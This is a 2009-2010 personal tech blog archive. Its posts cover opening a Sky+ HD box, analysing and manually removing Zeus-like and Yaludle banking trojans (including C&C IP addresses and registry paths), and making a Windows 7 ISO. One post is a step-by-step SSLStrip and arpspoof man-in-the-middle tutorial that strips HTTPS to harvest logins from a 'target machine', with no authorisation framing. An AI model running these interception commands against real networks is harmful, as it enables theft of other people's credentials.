Jun 02 2010

Getting inside the Amstrad drx895 / 1tb Sky+ HD box

Category: PracticalParker @ 6:34 pm

Been a while since I have done or learnt anything worthy of publication, but last night I took it upon myself to figure out how to access the internals of my new 1tb Sky HD box and since there seem to be no other guides, I figured I would stick my neck out.

So, why did I risk voiding my warranty and bricking the brand new box? Well, so that I could transfer all of my old recorded programs from the last box onto the new one, not mission critical, but I had a lot of recorded programs that I still needed to work my way through. I’ll put some guidance on those steps as well, but I would suggest following the FAQ’s on the Copy + page.

Required tools

  • A standard electrical screwdriver
  • A 2mm / 3mm flat head screwdriver
  • Standard flat pliers

Gaining access

Turn the Sky box upside down, ensuring you place the nice new glossy topside on something that isn’t going to snag or scratch it.

Remove the two plastic ‘grills’ on either end. They should just pop off with a light outwards tug. Second photo shows the simple plastic clips that hold them in place.

Pull towards you to remove.

See simple plastic 'retaining clips'

Having removed side grills, there are four screws which need to be removed from the base of the device [ edit ] and one from the rear, just above and to the left of the HDMI port.

Remove four encircled screws.

Again from the underside of the box, lift the retaining clasp and ease the outer box forwards. BE CAREFULL TO KEEP LEVEL, any torquing may damage LEDs or buttons from the front of the device.

Carefully lift clip with a flathead screw driver and ease outer box forwards

You can now remove the remaining side pieces of black plastic, which will have probably fallen off on their own, but are again pushed towards the front of the box to release the ‘L’ retaining clip from the metal case body.

The last piece of the plastic outer body to remove

You should now only have a metal innards of the box now, you can turn this the right way up. CAREFULLY remove the ribbon from the front connection, to the left of the middle black piece.

Carefully remove from retaining port.

If you now look at the box from above you will see four twisted metal retaining clasps, with a set of pliers delicately twist these straight.

Twist each of the encircled items straight with pliers.

You should now be able to lift the lid from the front, gently pivoting it at the rear, before lifting up completely to reveal the compact and surprisingly well organised innards.

The insides that are revealed.

You can now access the SATA port and power for the hard drive in the bottom right hand corner. If using something like Copy +, I would suggest removing these items and connecting new cables from your PC, rather than trying to remove the hard disk (Surely you don’t need more than 1tb anyway….?)

Tags: , , , , , , ,

Feb 22 2010

Zeus may be old, but he isn’t afraid of change

Category: Malware,Password Stealing,Practical,TrojanParker @ 7:47 pm

I should really lay my cards on the table at the start of this item. I do not know that this is Zeus, it is currently a working assumption, noting a number of similarities between this new virus and other Zeus samples I have seen.

So first off, what is the same?

  • It changes the registry item HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit Inserting a dynamically changing executable, into the key data, to ensure its presence at each boot of the system. In my most recent infection instance, it changes the value data to C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\msicjg32.exe
  • It loads the executable and hides it from view, using rootkit techniques.
  • It conducts HTML injection attacks
  • It is capable of MitB / MitM attacks
  • It targets Banking credentials and more than likely other login details, such Paypal & Facebook.

What is new?

  • The virus no longer uses the static executable name sdra64.exe. Instead it chooses a pseudo random name at install. I have seen msrwez32.exe | msjrtr32.exe | msicjg32.exe, so it would appear a format msXXXX32.exe is used.
  • There is no creation of a c:\windows\system32\lowsec folder. So stolen data and configuration detail is stored somewhere other than usual. This would appear to come from a jpg that can be seen coming in if using packet capture. The file is normally at the C&C domain within a location of /images/arrowred.jpg If have not been able to obtain this file or indeed find anything that could even attempt to decrypt it, but I informed that config details are held within it.
  • As with all viruses, these processes grab config detail from Command & Control servers. To the best of my ability I believe these sites to be http;//216.119.129.14 and http;//209.172.59.132. With luck these will be offline soon. I have now seen that these files have a list of possible C&Cs and move around as quickly as they are taken offline. Those who need to know of them do, and I do not propose to begin retaining a list here.

Antivirus detection rates, as follows;

Product – Version – Update – Virus Alias
a-squared 4.5.0.50 2010.02.22 Worm.Win32.Pushbot!IK
AhnLab-V3 5.0.0.2 2010.02.22 -
AntiVir 8.2.1.172 2010.02.22 TR/Spy.ZBot.afdw
Antiy-AVL 2.0.3.7 2010.02.22 -
Authentium 5.2.0.5 2010.02.22 -
Avast 4.8.1351.0 2010.02.22 Win32:EggDrop-CG
AVG 9.0.0.730 2010.02.22 -
BitDefender 7.2 2010.02.22 Trojan.Generic.3193268
CAT-QuickHeal 10.00 2010.02.22 -
ClamAV 0.96.0.0-git 2010.02.22 Trojan.EggDrop-121
Comodo 4026 2010.02.22 TrojWare.Win32.Spy.Zbot.afdw
DrWeb 5.0.1.12222 2010.02.22 Trojan.DownLoad.35735
eSafe 7.0.17.0 2010.02.22 Win32.EggDrop
eTrust-Vet 35.2.7318 2010.02.22 -
F-Prot 4.5.1.85 2010.02.22 -
F-Secure 9.0.15370.0 2010.02.22 Trojan.Generic.3193268
Fortinet 4.0.14.0 2010.02.21 -
GData 19 2010.02.22 Trojan.Generic.3193268
Ikarus T3.1.1.80.0 2010.02.22 Worm.Win32.Pushbot
Jiangmin 13.0.900 2010.02.22 -
K7AntiVirus 7.10.980 2010.02.22 -
Kaspersky 7.0.0.125 2010.02.22 Trojan-Spy.Win32.Zbot.afdw
McAfee 5900 2010.02.22 -
McAfee+Artemis 5900 2010.02.22 Artemis!1B0138229529
McAfee-GW-Edition 6.8.5 2010.02.22 Heuristic.LooksLike.Trojan.Agent.B
Microsoft 1.5406 2010.02.22 -
NOD32 4888 2010.02.22 probably a variant of Win32/Injector.AXM
Norman 6.04.08 2010.02.22 -
nProtect 2009.1.8.0 2010.02.22 -
Panda 10.0.2.2 2010.02.22 Trj/CI.A
PCTools 7.0.3.5 2010.02.22 -
Prevx 3.0 2010.02.22 High Risk Cloaked Malware
Rising 22.34.01.03 2010.02.11 -
Sophos 4.50.0 2010.02.22 Mal/Resdro-A
Sunbelt 5692 2010.02.22 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.02.22 Suspicious.Insight
TheHacker 6.5.1.6.205 2010.02.22 -
TrendMicro 9.120.0.1004 2010.02.22 -
VBA32 3.12.12.2 2010.02.22 -
ViRobot 2010.2.22.2196 2010.02.22 -

Removal

I am not yet confident in the exact way in which this malware functions, so I am not confident that the below is an absolute removal process. It does however appear to resolve the issue, so is better than nothing. As soon as I learn more, I will be sure to update.

  • Open regedit (normally via Start > Run) and drill down into the HKLM\Software\Microsoft\Windows NT\Current Version\Winlogon\Userinit string and note its value data.
  • You will need to kill a thread, loaded into memory, which retains the malicious presence within the Winlogon key, simply deleting the malicious value data is not enough.
  • Download and run the ProcessExplorer application from the TechNet website.
  • Access View and ensure that Lower Pane view is enabled.
  • On the top menu bar, select Find Handle or DLL. Within search type and search for the executable found within the Userinit data value. (msXXXX32.exe)
  • This should find and select executable within your Lower Pane. In the top pane, locate and double click on Winlogon.
  • From the new Window select the threads tab (this will sometimes produce an error, which can just be clicked past).
  • Once the threads have displayed, sort by CSwitch Data. There will be one thread which shows as constantly active (retains a numeric value).
  • Once this thread is identified, highlight it and select Kill from the bottom right.
  • Exit ProcessExplorer, reopen regedit and drill down onto the Winlogon\Userinit key. Delete the malicious value, from the userinit key data.
  • Restart the PC.
  • This should have stopped the virus loading at boot, allowing you to locate the executable within C:\windows\system32\. This should be purged from the system.

Tags: , ,

Feb 21 2010

Updates a plenty.

Category: PracticalParker @ 6:32 pm

Having awoken to snow this morning, my day has been a little less busy than previously planned. So I have taken the opportunity to address some issues within this site.

Many of the ‘articles’ are written whilst I do something else, so attention to detail can sometimes be a little lacking, because of this, I have taken the time to correct and address any spelling, grammar or layout issues that I have found on a re-read. Further to this I have added a bit more meat to the bones on certain articles, such as the Silon and Zeus documents.

Feb 12 2010

Attempts to infect a machine fall flat

Category: Malware,Practical,TrojanParker @ 7:09 pm

Who would think that infecting a machine with a virus would be this difficult. Have done all I can think of but I only have muted success with getting a bloody malicious DLL to start messing with my data streams..

Will have a few more goes before I either give up or blame a poor implementation.

Tags:

Jan 30 2010

Quick Update

Category: PracticalParker @ 7:17 pm

Well, it certainly wasn’t quick, but I have taken some time to organise things a little better within the malware sample section and have also added my personal twist to the WordPress theme I use.

Not awe inspiring, but think it looks OK.

Jan 24 2010

Backtrack 4 & SSLStrip-0.7 at last!

Category: Password Stealing,PracticalParker @ 9:56 pm

OK,

So I have been wanting to document this for a while, but have failed to do so. Luckily time and the recent BackTrack4 final release have conspired with me today, so I have been able to do it at last. So, sitting comfortably? Here comes the science bit.

Before you do this, I suggest you have the following installed; SSLStrip and Python. Make sure you also have a Linux distribution (such as BackTrack) and hardware combo that supports ARP injection. Once all of that is in place, you can conduct what is a very simple attack. (For reference I use an Acer Aspire One Z250 and Backtrack 4)

  • First enable port forwarding with the following command into a terminal window  echo “1″ > /proc/sys/net/ipv4/ip_forward
  • Then define what traffic you wish to capture (always port 80, I would think) and which port you will forward this traffic to. The values in bold should be replaced with the relevant ports iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>


  • You must now use that clever man’s python script to start stripping out the SSL, matching the listenPort with that above  python sslstrip.py -l <listenPort>

Having set your machine to pick up, forward and inspect all the traffic from your target machine, we now need to do is ensure that all the traffic from your target machine is routed through your hardware.  We do this with a Man In The Middle attack, placing yourself between the target machine and the network router.
We achieve this with a simple ARP attack, which continues to ‘inform’ the target machine that you are the router, with which it wishes to speak.

  • Within a new terminal window (to keep it clean, if nothing else), enter the following, (values in bold should be replaced with relevant values) arpspoof -i <interface> -t <targetIP> <gatewayIP>


Now all you need do is wait, all the target machine’s traffic will route though your machine and their browsing will probably seem slow, but any sites which they visit, who implement poor SSL encryption will be easy prey. The data that is captured will be placed into a .log file and available by opening a new terminal and entering more sslstrip.log (ensuring you are in the SSLStrip directory)

You’ll note that such popular sites as www.facebook.com / www.twitter.com and the “newly secure” www.gmail.com are all easy pickings!

Details captured by SSLStrip

I thank you!

Jan 14 2010

MitM attack with SSLStrip

Category: PracticalParker @ 8:24 am

Urm, got kind of distracted of late and haven’t got around to documenting how you conduct the same LAN attack. Have just found out that BackTrack4 Final has been released though, so I will install that and then do it. I promise

Tags:

Jan 04 2010

Yaludle

Category: Malware,Practical,Programs,TrojanParker @ 9:27 pm

Well another virus that’s on the radar, this time one carries an alias of Yaludle.
No real info re the installer, or exploit type but suffice to say this one is bad news and by replacing a number of key drivers within your registry, it ensures that it loads up every time your PC does.

As a very quick synopsis of the risks, this virus is capable of Man In The Browser / Man In The Middle attacks to take place, which will typically go after your banking credentials but as with many banking trojans, it is not against going after your other sensitive info with keylogging.

Anyway, to get rid of it, you need to do as follows;

  1. Close all instances of Internet Explorer.
  2. Open ProcessExplorer and Regedit.
  3. Get the DLL name from the registry key => HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi2 and write it somewhere. Should be in the format of 8 hex digits + 1.
  4. Use ProcessExplorer to search for that hex value. Locate and close all found handles that have that value (some may be mutex objects). In ProcessExplorer => View => Lower Pane View => Handles (or Ctrl+H) Find => Find Handle or DLL Search the first 4 digit of the file. You get a list of handles that relates to the malware. Close them with ProcessExplorer or handle.exe.

Delete these registry keys:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi2
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\wave1
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\mixer2
  • HKCU\Software\Macromedia\
  • HKCU\Software\AppDataLow\Software\Macromedia\
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WAB

Delete these files:

  • %Appdata%\ Macromedia \Common\
  • %Appdata%\Macromedia\Common\
  • (8-digit-hex).exe
  • %TMP%
  • (8-digit-hex).tmp

I also recommend clearing the Temp folders on that machine.

  • %Temp%
  • %Systemroot%\Temp

Having done all of that, a restart of the machine should load without any malicious Yaludle items present. For peace of mind, you can repeat step 4 of the above to ensure that no handles or other loaded objects still carry that hex value.

Dec 30 2009

Coming up….

Category: Practical,ProgramsParker @ 1:24 pm

Well, as soon as I’ve settled upon the location of the new Denon DM37DAB AV I’ve just got, I’ll be documenting a Man In The Middle attack using my Acer Netbook, BackTrack4 and a Linux tool named SSL-Strip.

Should point out that I learnt what I know from a podcast show called Hak5. Check them out at http://hak5.org (Well worth a look, they often discuss very interesting items that you can play with, learn from at home).

Tags:

Oct 23 2009

Windows 7 ISO creation post Digital River download

Category: Practical,ProgramsParker @ 9:41 am

So I got the Digital River digital download of Windows 7. Assuming that I would receive all the details promptly and that I would be able to download an ISO image, was it seems, a HUGE assumption, because neither was the case. What I did receive via email, was guidance text with blank spaces where my download link and product key should have been. Still waiting on my key, but at least this morning I was able to locate the download tool within my orders on the Digital River site.

So, whilst awaiting my product key I have been trawling the internet, in the hope of finding some guidance on turning their exe installer, into an ISO.
Having found some miss-guidance, I have finally found a guide with the correct steps so though it best to note it here.

  • To create the ISO, first download the installation, move it to your C:/ root drive and double click on the exe.
  • A expandedSetup folder will be created, when the installation window opens close it down.
  • Grab this file and extract it to your C:/Windows/System32 folder
  • Now open up cmd as admin and type the following (without quotations at either end)
  • “oscdimg -bC:\expandedSetup\boot\etfsboot.com -h -u2 -m -lWIN_EN_DVD C:\expandedSetup\ C:\win7.iso”

Within 5 minutes you should have an ISO image ready to burn called Win7.iso within your C:/ drive.

Thanks and praise goes to ‘robbdn’ on technet, who was the first person I found who provided the correct command syntax.

Tags: , ,

Next Page »